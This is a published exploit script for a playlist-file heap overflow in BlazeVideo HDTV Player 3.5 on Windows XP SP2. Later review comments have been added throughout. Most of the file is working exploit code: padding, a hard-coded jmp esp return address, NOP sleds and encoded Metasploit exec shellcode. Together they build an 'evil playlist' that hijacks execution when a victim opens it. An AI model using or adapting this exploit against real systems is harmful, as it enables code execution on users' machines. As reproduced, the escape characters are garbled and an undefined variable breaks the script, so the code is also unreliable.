
# Title : BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Overflow Exploit
# Published : 2009-02-04
# Author : LiquidWorm


#!/usr/bin/python
#
# Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Heap Overflow Exploit
#
# Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV
# Player software, combining HDTV playback, FM receiving, video record and DVD playback
# functions. You can take advantage of the PC monitor's high resolution to watch, record and play back
# high-definition HDTV programs or teletext broadcasts.
#
# Product web page: http://www.blazevideo.com/hdtv-player/index.htm
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# ------------------------------------windbg------------------------------------
#
# (620.d74): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001
# eip=43434343 esp=0013f288 ebp=6405247c iopl=0         nv up ei pl nz ac pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
# 43434343 ??              ???
#
#--------------------------------------------------------------------------------
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail [w00t] com
#
# http://www.zeroscience.org/
#
# 03.01.2009
#


# NOTE(review): Python 2 only (print statements, raw_input); this will not parse under Python 3.
# What the script does: it writes a .plf playlist file ("Groundhog_Day.plf") whose content is a
# long run of filler bytes, a hard-coded address and a shellcode blob instead of playlist entries,
# targeting the heap overflow described in the header. From a defensive viewpoint that is the
# artefact to look for: a playlist file of a few hundred bytes consisting mostly of one repeated
# byte followed by non-text data.
print "--------------------------------------------------------------------------"
print " BlazeVideo HDTV Player <= 3.5 Playlist File Remote Heap Overflow Exploitn"
print "tttby LiquidWorm [liquidworm[t00t]gmail.com] - 2009n"
print "--------------------------------------------------------------------------"

# 260 bytes of filler preceding the address that is meant to land in EIP (the crash dump in the
# header shows EIP fully controlled). The name shadows the Python 2 builtin `buffer`.
# NOTE(review): as reproduced on this page the escape sequences have lost their backslash prefix
# ("x41" is four ASCII characters, not one byte); the same applies to every string literal below,
# so the listing as shown does not assemble the bytes the header describes.
buffer = "x41" * 260

# Address of a `jmp esp` inside user32.dll on the tested Windows XP SP2 (English) build (see
# header). It is only valid where user32.dll loads at that same fixed base, which is why this kind
# of exploit is version- and locale-specific and why address randomisation breaks it.
eip = "xc0x25x49x7e" #jmp esp  user32.dll

# Short NOP sled, placed both before and after the payload to absorb small offset differences.
nop = "x90" * 15

# Payload as labelled by the generator comment: Alpha2 (alphanumeric) encoded win32_exec that runs
# `sol` (Solitaire) - a visible proof-of-concept marker rather than a damaging command.
# win32_exec -  EXITFUNC=thread CMD=sol Size=328 Encoder=Alpha2 http://metasploit.com
shellcode = (
	"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
	"x49x49x49x49x49x49x49x49x49x49x49x51x5ax48x6ax65"
	"x58x30x42x31x50x42x41x6bx41x41x75x32x41x42x32x42"
	"x41x30x42x41x41x58x38x41x42x50x75x39x79x6bx4cx4a"
	"x48x47x34x43x30x45x50x57x70x4cx4bx71x55x77x4cx4c"
	"x4bx71x6cx37x75x30x78x75x51x78x6fx4cx4bx52x6fx32"
	"x38x4cx4bx63x6fx45x70x55x51x5ax4bx31x59x6cx4bx44"
	"x74x6cx4bx55x51x4ax4ex76x51x49x50x6dx49x4cx6cx4e"
	"x64x6fx30x30x74x43x37x7ax61x59x5ax36x6dx46x61x6a"
	"x62x58x6bx7ax54x45x6bx76x34x47x54x64x44x53x45x79"
	"x75x4cx4bx63x6fx51x34x67x71x4ax4bx50x66x4cx4bx76"
	"x6cx30x4bx4cx4bx43x6fx67x6cx34x41x58x6bx6ex6bx75"
	"x4cx6cx4bx37x71x38x6bx6cx49x63x6cx54x64x44x44x79"
	"x53x50x31x69x50x63x54x4cx4bx63x70x34x70x4bx35x4f"
	"x30x53x48x56x6cx6ex6bx71x50x76x6cx4cx4bx34x30x45"
	"x4cx4cx6dx4ex6bx50x68x55x58x5ax4bx54x49x4cx4bx6f"
	"x70x4ex50x55x50x63x30x75x50x4cx4bx72x48x55x6cx71"
	"x4fx45x61x39x66x41x70x72x76x4fx79x6bx48x4dx53x4f"
	"x30x73x4bx50x50x50x68x6ax4fx48x4ex6dx30x43x50x62"
	"x48x6fx68x4bx4ex4fx7ax74x4ex46x37x39x6fx69x77x41"
	"x63x50x6fx70x6cx75x50x65"
	)

# Final file content: filler, address, sled, payload, sled.
# NOTE(review): `garbage` is never assigned anywhere in this listing (the filler above is bound to
# `buffer`), so this line raises NameError - outside the try block below - and no file is written
# when the script is run as shown.
payload = garbage + eip + nop + shellcode + nop

# Write the file in text mode, then block on a key press.
# NOTE(review): the bare `except` hides every failure (IOError on open/write, EOFError from
# raw_input, ...) behind a one-word message; catching IOError and printing the reason would be
# clearer, and `with open(...)` would guarantee the handle is closed if write() fails.
try:
	out_file = open("Groundhog_Day.plf",'w')
	out_file.write(payload)
	out_file.close()
	raw_input("nn[*] Evil playlist successfully created.nnPress any key to continue...")
except:
	print "Oops!"
